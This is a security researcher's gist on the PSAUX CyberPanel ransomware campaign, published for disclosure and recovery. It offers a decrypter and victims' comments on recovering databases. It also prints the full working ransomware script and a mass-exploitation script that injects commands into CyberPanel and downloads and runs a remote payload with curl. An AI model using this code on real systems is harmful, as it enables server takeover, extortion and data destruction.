Skip to content

Instantly share code, notes, and snippets.

@gboddin
Last active October 31, 2024 08:21
Show Gist options
  • Save gboddin/d78823245b518edd54bfc2301c5f8882 to your computer and use it in GitHub Desktop.
Save gboddin/d78823245b518edd54bfc2301c5f8882 to your computer and use it in GitHub Desktop.
cyberpanel 0day leaked attack script

CyberPanel PSAUX attack/defense

This repo contains 2 things:

  • A decryption script
  • A list of files found on the threat-actor's server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extension they leave are:

  • .psaux
  • .encryp
  • .locked

Decryption

If your server was only targeted by PSAUX and files have the .psaux extension, due to a flaw in PSAUX's implementation, you should be able to use the decrypter.

#!/bin/bash
######################################################################################
# LeakIX PSAUX CyberPanel Ransom campaign decrypter #
# #
# You have been blessed by PSAUX #
# #
# All your files can be decrypted. #
# #
# #
# Telegram: @psauxsec #
# #
# Fun must be made on that channel for weak crypto, #
# #
# Ransomware Rushed by PSAUX #
# #
######################################################################################
# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK
### Fail the script if anything's wrong, that's people's data we're dealing with
set -e
echo "Running PSAUX CyberPanel decrypter..."
### Master key gently provided by PSAUX
MASTER_KEY="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$MASTER_KEY" > /tmp/private.pem
MASTER_KEY_PATH="/tmp/private.pem"
# Decrypt the encryption key with the master key
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/key.enc -out /tmp/key.enc
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/iv.enc -out /tmp/iv.enc
local_key=$(cat /tmp/key.enc|xxd -p)
local_iv=$(cat /tmp/iv.enc|xxd -p)
echo "Recovered key: $local_key IV: $local_iv"
# Find all psaux file and decrypt them
find / -name "*.psaux" -type f|while read file; do
openssl enc -aes-128-cbc -d -K ${local_key} -iv ${local_iv} -in "${file}" -out "${file%\.psaux}" && rm "${file}"
echo "Restored ${file%\.psaux}"
done
#!/usr/bin/env bash
private="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem
key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"
PRIVATE_KEY_PATH="/var/private.pem"
if [ ! -f "$PRIVATE_KEY_PATH" ]; then
echo "Private key not found at $PRIVATE_KEY_PATH"
exit 1
fi
PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
echo "Could not read the private key (maybe permission issue?)"
exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."
login_message="
######################################################################################
# Encryptions ID : ${key_name} #
# You have been hacked by PSAUX #
# #
# All your files have been encrypted. #
# #
# To restore access, you can contact us in Telegram #
# #
# Telegram: @psauxsec #
# #
# Payment must be made in cryptocurrency. #
# #
# The price for decryption is 200 dollars. #
# Sample decryption can be served upon request. #
# #
# After payment, you will receive a key to run the decrypter script #
# on your system to restore your files. #
# All your database is downloaded and if you are not going to pay in next 3 days #
# its going to be published in darknet. Best Regards! #
# #
# #
# #
# Ransomware Made by PSAUX #
# #
######################################################################################
"
echo "$login_message" > /etc/motd
key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"
echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
echo "Key encrypted successfully: /var/key.enc"
else
echo "Error with key encryption"
exit 1
fi
echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
echo "IV encrypted successfully: /var/iv.enc"
else
echo "Error with IV encryption"
exit 1
fi
excluded_dirs=(
"/proc"
"/sys"
"/dev"
"/run"
"/etc"
"/usr"
"/tmp"
"/var/run"
"/var/lock"
"/var/tmp"
"/mnt"
"/sbin"
"/lib64"
"/bin"
"/boot"
"/lib"
"/lib32"
"/srv"
"/libx32"
"/media"
"/lost+found"
)
excluded_files=(
"/var/key.enc"
"/var/iv.enc"
"/var/decrypter.sh"
"/var/index_template.html"
)
is_excluded() {
local path=$1
for excluded in "${excluded_dirs[@]}"; do
if [[ "$path" == "$excluded"* ]]; then
return 0
fi
done
for excluded in "${excluded_files[@]}"; do
if [[ "$path" == "$excluded" ]]; then
return 0
fi
done
return 1
}
encrypt_directory() {
local dir=$1
echo "Encrypting directory: $dir"
find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "Encrypting file: $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
}
encrypt_directory "/"
find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
if ! is_excluded "$dir"; then
cp /var/index_template.html "$dir/index.html"
fi
done
find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "[+] : $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
rm -- "$0" && exit 0
import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
def get_CSRF_token(client):
try:
resp = client.get("/")
if resp.status_code == 200:
return resp.cookies.get('csrftoken')
else:
print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
return None
except httpx.RequestError:
print(f"Failed to connect to {client.base_url}")
return None
def pwn(client, CSRF_token, cmd):
if not CSRF_token:
return "No CSRF token"
headers = {
"X-CSRFToken": CSRF_token,
"Content-Type": "application/json",
"Referer": str(client.base_url)
}
payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
try:
response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
if response.headers.get("Content-Type", "").startswith("application/json"):
return response.json().get("requestStatus", "No response")
else:
print(f"Unexpected response type from {client.base_url}: {response.text}")
return "Unexpected response"
except httpx.RequestError:
return "Failed to execute"
def execute_command(client, command):
CSRF_token = get_CSRF_token(client)
if not CSRF_token:
print(f"Could not retrieve CSRF token from {client.base_url}")
return "Failed to retrieve CSRF token"
print(f"Executing: {command} on {client.base_url}")
stdout = pwn(client, CSRF_token, command)
print(stdout)
return stdout
def process_target(target):
print(f"Processing target: {target}")
try:
client = httpx.Client(base_url=target, verify=False, timeout=5.0)
# Step 1: Download the file
if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
return
# Step 2: Check if the file exists, retry if necessary
file_exists = False
while not file_exists:
response = execute_command(client, "ls /var/actually.sh")
if "No such file or directory" not in response:
file_exists = True
print("File found. Proceeding with further steps...")
else:
print("File not found. Waiting for the download to complete...")
time.sleep(2) # Wait for 2 seconds before checking again
# Step 3: Change permissions for the downloaded file
execute_command(client, "chmod +x /var/actually.sh")
# Step 4: Remove any carriage return issues
execute_command(client, "sed -i 's/\r//g' /var/actually.sh")
# Step 5: Execute the script with nohup to detach and log to /dev/null
execute_command(client, "nohup /var/actually.sh")
print("Script executed and detached.")
except httpx.RequestError as e:
print(f"Could not connect to {target}. Error: {str(e)}")
def main(targets_file, max_threads=5):
try:
with open(targets_file, "r") as file:
targets = [line.strip() for line in file if line.strip()]
with ThreadPoolExecutor(max_threads) as executor:
future_to_target = {executor.submit(process_target, target): target for target in targets}
for future in as_completed(future_to_target):
target = future_to_target[future]
try:
future.result()
except Exception as exc:
print(f"{target} generated an exception: {exc}")
except FileNotFoundError:
print(f"Error: File {targets_file} not found.")
sys.exit(1)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python3 ak48.py targets.txt [max_threads]")
sys.exit(1)
targets_file = sys.argv[1]
max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5
main(targets_file, max_threads)
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai
@gboddin
Copy link
Author

gboddin commented Oct 30, 2024

Then feel free to zip to support@leakix.net

@DZORAJAN1996
Copy link

please if you know how to unlock .locked file write

@amjeed-ay
Copy link

amjeed-ay commented Oct 30, 2024

for thus using mysql database, I found out there database table files .ibd which are not affected. you may be able to recover your database from those files.

/var/lib/mysql

@user202856
Copy link

The read loop in 0-decrypt.sh treats any backslashes in the filenames fed into it as escape characters.
It needs to be read -r there.
@gboddin Thank you for for this gist!

@Orgoth
Copy link

Orgoth commented Oct 30, 2024

@gboddin

Then feel free to zip to support@leakix.net

also not possible

support@leakix.net: host mail.protonmail.ch[185.205.70.128] said: 554 5.7.1
We do not accept viral traffic (in reply to end of DATA command)

@gboddin
Copy link
Author

gboddin commented Oct 30, 2024

@gboddin

Then feel free to zip to support@leakix.net

also not possible

support@leakix.net: host mail.protonmail.ch[185.205.70.128] said: 554 5.7.1 We do not accept viral traffic (in reply to end of DATA command)

Just password protect the zip with infected

@gboddin
Copy link
Author

gboddin commented Oct 30, 2024

please if you know how to unlock .locked file write

That looks unlikely. Only .psaux made an encryption mistake.

  • One of the group .locked properly u-sed asymetric encryption to ensure recovery is impossible
  • The other group .encryp seem to use a binary that is still under analysis, but it seems they do asymetric encryption as well and recompile the binary for each target

@gboddin
Copy link
Author

gboddin commented Oct 30, 2024

The read loop in 0-decrypt.sh treats any backslashes in the filenames fed into it as escape characters. It needs to be read -r there. @gboddin Thank you for for this gist!

No pb.

I forgot to quote the filenames at line 75. should now work!

@Orgoth
Copy link

Orgoth commented Oct 30, 2024

please if you know how to unlock .locked file write

That looks unlikely. Only .psaux made an encryption mistake.

  • One of the group .locked properly u-sed asymetric encryption to ensure recovery is impossible
  • The other group .encryp seem to use a binary that is still under analysis, but it seems they do asymetric encryption as well and recompile the binary for each target

Ok thank you for your time and work, then it is not possible to recover.
It was only a test-/dev-Server in my case.
For everyone else, I feel sorry.

@KevinErasmus1999
Copy link

has anyone had success in restoring the files

@amjeed-ay
Copy link

has anyone had success in restoring the files

I successfully recovered mysql database from ibd files found not ecrypted by the attack

@Orgoth
Copy link

Orgoth commented Oct 30, 2024

has anyone had success in restoring the files

I successfully recovered mysql database from ibd files found not ecrypted by the attack

@amjeed-ay
How did you recover the database?
I have checked mine and only the frm files are missing.

@amjeed-ay
Copy link

amjeed-ay commented Oct 30, 2024

@Orgoth

Stop MySQL and replace the new empty .ibd file with your old .ibd file (backup the original).
Run the ALTER TABLE <table_name> DISCARD TABLESPACE followed by ALTER TABLE <table_name> IMPORT TABLESPACE commands to link the file back to the database.

@Orgoth
Copy link

Orgoth commented Oct 30, 2024

@amjeed-ay For me it will not work.

ERROR 1030 (HY000): Got error 194 "Tablespace is missing for a table" from storage engine InnoDB

I suspect, it is a problem with mariadb

@digitalserv
Copy link

@Orgoth

You can try creating a new temporary database for recovering and then creating all tables based on the schema of original tables. After that, you can "replace" .ibd files one at a time (if you have foreign ids, you should do it in the right order ~ parent first). The steps you should be done for every table you need to recover:

  1. Run ALTER TABLE your_table DISCARD TABLESPACE;
  2. Copy the IBD file in your_table folder (after 1st step the default IBD file should disapear)
  3. Run ALTER TABLE your_table IMPORT TABLESPACE;

When you finish, you can export/import to your main database.

@amjeed-ay
Copy link

@amjeed-ay For me it will not work.

ERROR 1030 (HY000): Got error 194 "Tablespace is missing for a table" from storage engine InnoDB

I suspect, it is a problem with mariadb

Here's a refined guide to share with your community about recovering a MySQL database from .ibd files post-attack:


I was able to recover my database using these steps:

  1. Match MySQL Versions: Ensure the same MySQL version as the original.
  2. Retrieve Database Backup: Get a database copy, even from old backups.
  3. Replace .ibd Files: Swap existing .ibd files with the ones from the infected server.
  4. Drop Table Indexes and Foreign Keys.
  5. Run Tablespace Commands:
    • ALTER TABLE your_table DISCARD TABLESPACE;
    • ALTER TABLE your_table IMPORT TABLESPACE;
  6. Handle Errors: If errors occur, replace .ibd files and try again.

I was fortunate the attack didn’t encrypt .ibd files. This incident reinforced the importance of strong security measures and maintaining redundant backups. Stay prepared!

@akwasi-dehaan
Copy link

@amjeed-ay For me it will not work.
ERROR 1030 (HY000): Got error 194 "Tablespace is missing for a table" from storage engine InnoDB
I suspect, it is a problem with mariadb

Here's a refined guide to share with your community about recovering a MySQL database from .ibd files post-attack:

I was able to recover my database using these steps:

  1. Match MySQL Versions: Ensure the same MySQL version as the original.

  2. Retrieve Database Backup: Get a database copy, even from old backups.

  3. Replace .ibd Files: Swap existing .ibd files with the ones from the infected server.

  4. Drop Table Indexes and Foreign Keys.

  5. Run Tablespace Commands:

    • ALTER TABLE your_table DISCARD TABLESPACE;
    • ALTER TABLE your_table IMPORT TABLESPACE;
  6. Handle Errors: If errors occur, replace .ibd files and try again.

I was fortunate the attack didn’t encrypt .ibd files. This incident reinforced the importance of strong security measures and maintaining redundant backups. Stay prepared!

does this mean if my .ibd where encrypted to .ibd.locked, I can't retrieve my data?

@zapsjava
Copy link

yes, if your file is .ibd.locked then this will not work.
if your system was encrypted with extension .encryp then your .ibd files most likely were left unencrypted and you have chance to recover database

@Orgoth
Copy link

Orgoth commented Oct 30, 2024

@amjeed-ay Thank you very much for your time and the refined guide.

I had created a new database within the rescue console.

  1. Same Mariadb version.
  2. Sadly no older db is available, since it was a test and dev system without external backups
    2.1. Someone decided to put a project on this server which was in use -_- I am trying to save at least 2 - 3 tables, all other projects are already up and running since they are only tests and dev without any important data

I will test again on Friday, at the moment I am completely burned out.

yes, if your file is .ibd.locked then this will not work.
if your system was encrypted with extension .encryp then your .ibd files most likely were left unencrypted and you have chance to recover database

Only the frm were encrypted.

@AhmadOsamaSaad
Copy link

AhmadOsamaSaad commented Oct 30, 2024

All my files are encrypted with [.locked format].
What is the correct way to decrypt these files and codes above?

@LinuxCuba
Copy link

@Orgoth @adnanebrahimi

This script was made for the variant that renames files to .psaux .

This is interesting, we don't know if there are multiple groups competing or if they changed their script.

In any case we're interested to get the content of the ransom note, any keys that was left ( in tmp or other ) and a sample encrypted file.

Contact us at support@leakix.net

They have not tried without the same /var/key.enc and /var/iv.enc files as before, they are used with the key to unlock the files that are only .locked.

@LinuxCuba
Copy link

All my files are encrypted with [.locked format]. What is the correct way to decrypt these files and codes above?

At the moment if you don't have the files /var/key.enc and /var/iv.enc, nothing can be done.

@LinuxCuba
Copy link

@amjeed-ay For me it will not work.
ERROR 1030 (HY000): Got error 194 "Tablespace is missing for a table" from storage engine InnoDB
I suspect, it is a problem with mariadb

Here's a refined guide to share with your community about recovering a MySQL database from .ibd files post-attack:
I was able to recover my database using these steps:

  1. Match MySQL Versions: Ensure the same MySQL version as the original.

  2. Retrieve Database Backup: Get a database copy, even from old backups.

  3. Replace .ibd Files: Swap existing .ibd files with the ones from the infected server.

  4. Drop Table Indexes and Foreign Keys.

  5. Run Tablespace Commands:

    • ALTER TABLE your_table DISCARD TABLESPACE;
    • ALTER TABLE your_table IMPORT TABLESPACE;
  6. Handle Errors: If errors occur, replace .ibd files and try again.

I was fortunate the attack didn’t encrypt .ibd files. This incident reinforced the importance of strong security measures and maintaining redundant backups. Stay prepared!

does this mean if my .ibd where encrypted to .ibd.locked, I can't retrieve my data?

exact

@LinuxCuba
Copy link

has anyone had success in restoring the files

I successfully recovered mysql database from ibd files found not ecrypted by the attack

Me too, The databases in /var/lib/mysql were not affected. On the attacked server, copy this directory to a safe place after mounting the affected virtual machine disk. Restore from the backup, I didn't start the vm, I mounted your hard drive and copied the copy of /var/lib/mysql, from the old one to the new vm disk. Then I started the server, and upgraded cyberpanel, everything worked again.

This is in case your databases were not affected by this ramsonware.

@LinuxCuba
Copy link

Here the importance of having daily backups of everything in another remote location.

Best regards.

@kilian099
Copy link

Hi I have been hacked with .locked encrypt files, I really screwed up with this messy ransomware. Is there any way to fix this?

@exzept
Copy link

exzept commented Oct 31, 2024

[.locked format] what's the right thing to do?

@Akrobs
Copy link

Akrobs commented Oct 31, 2024

[.locked format] what's the right thing to do?

It's C3RB3R Conti v3-based Ransomware

No decryptors (((

@exzept
Copy link

exzept commented Oct 31, 2024

I mean reinstall the entire system?

@Akrobs
Copy link

Akrobs commented Oct 31, 2024

I mean reinstall the entire system?

I think yep... There are no other options.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment